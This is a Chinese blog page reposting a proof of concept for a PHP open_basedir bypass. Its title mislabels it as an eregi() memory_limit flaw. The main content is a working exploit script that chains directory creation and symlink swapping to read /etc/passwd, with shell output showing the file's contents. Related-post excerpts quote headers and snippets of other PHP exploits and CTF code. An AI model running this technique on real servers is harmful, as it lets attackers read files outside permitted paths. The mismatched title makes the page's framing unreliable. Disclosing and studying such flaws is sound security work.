php 5.4漏洞,PHP 5.4/5.3弃用函数eregi() memory_limit绕过漏洞

最新推荐文章于 2022-04-18 20:21:55 发布
最新推荐文章于 2022-04-18 20:21:55 发布
阅读量225 收藏
点赞数
文章标签: php 5.4漏洞

PoC:

127# cat sym.php

<?php

symlink("/etc/passwd", "./symlink");

?>

127# php sym.php

PHP Warning: symlink(): open_basedir restriction in effect. File(/etc/passwd) is not \

within the allowed path(s): (/www) in /www/test/sym.php on line 2

Warning: symlink(): open_basedir restriction in effect. File(/etc/passwd) is not \

within the allowed path(s): (/www) in

/www/test/sym.php on line 2

127#

open_basedir will disallow /etc/passwd.

Let`s see:

127# ls -la

total 8

drwxr-xr-x 2 www www 512 Oct 20 00:33 .

drwxr-xr-x 13 www www 1536 Oct 20 00:26 ..

-rw-r--r-- 1 www www 356 Oct 20 00:32 kakao.php

-rw-r--r-- 1 www www 45 Oct 20 00:26 sym.php

127# pwd

/www/test

127# cat kakao.php

<?php

mkdir("abc");

chdir("abc");

mkdir("etc");

chdir("etc");

mkdir("passwd");

chdir("..");

mkdir("abc");

chdir("abc");

mkdir("abc");

chdir("abc");

mkdir("abc");

chdir("abc");

chdir("..");

chdir("..");

chdir("..");

chdir("..");

symlink("abc/abc/abc/abc","tmplink");

symlink("tmplink/../../../etc/passwd", "exploit");

unlink("tmplink");

mkdir("tmplink");

?>

127# php kakao.php

127# ls -la

total 12

drwxr-xr-x 4 www www 512 Oct 20 00:37 .

drwxr-xr-x 13 www www 1536 Oct 20 00:26 ..

drwxr-xr-x 4 www www 512 Oct 20 00:37 abc

lrwxr-xr-x 1 www www 27 Oct 20 00:37 exploit -> tmplink/../../../etc/passwd

-rw-r--r-- 1 www www 356 Oct 20 00:32 kakao.php

-rw-r--r-- 1 www www 45 Oct 20 00:26 sym.php

drwxr-xr-x 2 www www 512 Oct 20 00:37 tmplink

127# cat exploit

# passwd

#

root:*:0:0:god:/root:/bin/csh

..

now "tmplink" is a directory. so link "exploit" will be "../../etc/passwd". We don't \

need bypass open_basedir, it is a design mistake. PHP will allow \

"tmplink/../../../etc/passwd" because ./tmplink/../../../etc/passwd really exists.

PoC:

http://cxsecurity.com/issue/WLB-2012030270

Remember. Don't use open_basedir as a main security feature.

PPT3031
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
5.4.16打断点 php_PHP 5.4.16和PHP 5.3.26发布!
weixin_39861498的博客
12-21 265
PHP 5.4.16和PHP 5.3.26发布!发布时间:2013-06-08 09:18:28来源:红联作者:empastPHP 5.4.16/5.3.26发布。2013-06-07 经过1个RC 上个版本是2013-05-09的5.4.15/5.3.25修正了大约15个Bug以及几个安全漏洞。如CVE-2013-2110 开发版本5.5RC3.完全改进:Version 5.4.1606-Jun...
e7xue.php漏洞_php5.4.3版本 远程代码执行漏洞
weixin_39737831的博客
12-21 377
PHP com_print_typeinfo()的漏洞,通过PHP代码调用"exec"可运行SHELL命令用这个提权是不是很方便了?保存php文件,代码:// Exploit Title: PHP 5.4 (5.4.3) Code Execution 0day (Win32)// Exploit author: 0in (Maksymilian Motyl)// Email: 0in(dot)em...
eregi函数漏洞
qq_54929891的博客
04-18 703
<?php if(!$_GET['id']) { header('Location: hello.php?id=1'); exit(); } $id=$_GET['id']; $a=$_GET['a']; $b=$_GET['b']; if(stripos($a,'.')) { echo 'no no no no no no no'; return ; } $data = @file_get_contents($a,'r');//eregi搜索字符串,$b的第一个字符和111拼接后检查1114从是否.
php 5.6.15漏洞,CVE-2016-4071
weixin_33089345的博客
03-11 528
// PHP <= 7.0.4/5.5.33 SNMP format string exploit (32bit)// By Andrew Kramer // Should bypass ASLR/NX just fine// This exploit utilizes PHP's internal "%Z" (zval)// format specifier in order to ach...
php 5.4漏洞,PHP 5.6 / 5.5 / 5.4 SplDoublyLinkedList Use-After-Free
weixin_42160424的博客
03-17 515
#Yet Another Use After Free Vulnerability in unserialize() withSplDoublyLinkedListTaoguang Chen - Write Date:2015.8.27 - Release Date: 2015.9.4> A use-after-free vulnerability was discovered in un...
php5.3 废弃函数小结
01-20
php5.3被放弃的函数有: ereg();//直接用mb_ereg代替,或是preg_match代替,但是匹配规则需要用/包括起来 eregi();//preg_match代替,在规则后加上i,如:preg_match(“/^(style|style_)(.*)*/i”, $file); ereg_...
php 升级到 5.3+ 后出现的一些错误,如 ereg(); ereg_replace(); 函数报错
10-23
PHP编程语言的发展历程中,随着版本的更新,一些旧的函数逐渐被弃用或替换。当PHP环境从较低版本升级到5.3及以上时,可能会遇到一些由于函数废弃而导致的错误,比如`ereg()`和`ereg_replace()`。这两个函数PHP ...
eregi_replace与preg_replace 函数代码的用法比较
10-30
在本文中,我们将深入探讨`eregi_replace`与`preg_replace`这两个PHP函数,并通过具体的示例来解析它们之间的差异以及如何正确使用这些函数。同时,我们也会详细解释所提供的示例代码中的各种符号及其含义。 ### 一...
centos PHP漏洞 补丁,PHP多个任意文件覆盖漏洞(CVE-2014-5120)
weixin_35607083的博客
03-10 263
发布日期:2014-07-31更新日期:2014-08-26受影响系统:PHP PHP < 5.5.16PHP PHP < 5.4.32描述:--------------------------------------------------------------------------------BUGTRAQ ID: 69375CVE(CAN) ID: CVE-2014-512...
php 5.4漏洞,PHP 5.4.3 'com_print_typeinfo()'远程代码执行漏洞
weixin_39538607的博客
03-17 385
// Exploit Title: PHP 5.4 (5.4.3) Code Execution 0day (Win32)// Exploit author: 0in (Maksymilian Motyl)// Email: 0in(dot)email(at)gmail.com// * Bug with Variant type parsing originally discovered by C...
php-5.4.19源代码
06-27
php-5.4.19的源代码,用于开发编译使用。
php5.4.x缓冲区溢出,英文漏洞报告解读(一)——PHP 5.4.x < 5.4.32 Multiple Vulnerabilities...
weixin_36118143的博客
03-11 461
Nessus扫描报告---------------------------------------------------------------------------------------------------------------------------------------------------------------HighPHP 5.4.x < 5.4.32 Multi...
php 5.4.0 漏洞,PHP 5.4.0 Built-in Web Server DoS PoC
weixin_35705523的博客
03-23 244
#!/usr/bin/python# Title: PHP 5.4.0 Built-in Web Server DoS PoC# Date: 16 March 2012# Author: ls (contact@kaankivilcim.com)# Reference: https://bugs.php.net/bug.php?id=61461# Comments:...
php拒绝服务,PHP远程拒绝服务攻击漏洞修复指引(7.15更新)
weixin_39653717的博客
03-13 793
Jul27PHP远程拒绝服务攻击漏洞修复指引(7.15更新)文 / UCloud 公关部2021-03-042015年5月15日,php官方发布安全漏洞通知,利用该漏洞攻击者可以通过发送一个精心构造的http请求,使服务器的cpu利用率达到100%。导致服务器无法正常工作。目前UCoud经过4天的打补丁、测试、灰度发布等工作已经率先修复该问题。UCloud网站不受该漏洞影响。漏洞描述:php在解析...
php中ereg函数的截断漏洞
qq_25987491的博客
04-15 6517
.ereg()函数用指定的模式搜索一个字符串中指定的字符串,如果匹配成功返回true,否则,则返回false。搜索字母的字符是大小写敏感的。int ereg(string pattern, string originalstring, [array regs]);例,$email_id = "admin@tutorialspoint.com";    $retval = ereg("(\.)(co...
PHP代码审计(ereg截断漏洞)
qq_36609913的博客
02-10 5342
&lt;?php $flag = "flag"; if (isset ($_GET['password'])) { if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE) { echo '&lt;p&gt;You password must be alphanumeric&lt;/p&gt;'; } els...
php函数漏洞
h3110n3w0r1d
04-05 1785
1.intval() intval — 获取变量的整数值 说明 int intval ( mixed $var [, int $base = 10 ] ) 通过使用指定的进制 base 转换(默认是十进制),返回变量 var 的 integer 数值。 intval() 不能用于 object,否则会产生 E_NOTICE 错误并返回 1。 参数 var 要转换成 integer 的...
高级PHP应用程序漏洞审核技术
王意林的专栏
10-27 8002
by: 80vul.com 目录  [隐藏] 1 前言2 传统的代码审计技术3 PHP版本与应用代码审计4 其他的因素与应用代码审计5 扩展我们的字典 5.1 变量本身的key5.2 变量覆盖 5.2.1 遍历初始化变量5.2.2 parse_str()变量覆盖漏洞5.2.3 import_request_variables()变量覆盖漏洞
英文漏洞报告解读(一)——PHP 5.4.x < 5.4.32 Multiple Vulnerabilities
weixin_34144450的博客
09-04 658
---------------------------------Nessus扫描报告----------------------------------------------------- ------------------------------------------------------------------------------------------------------...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值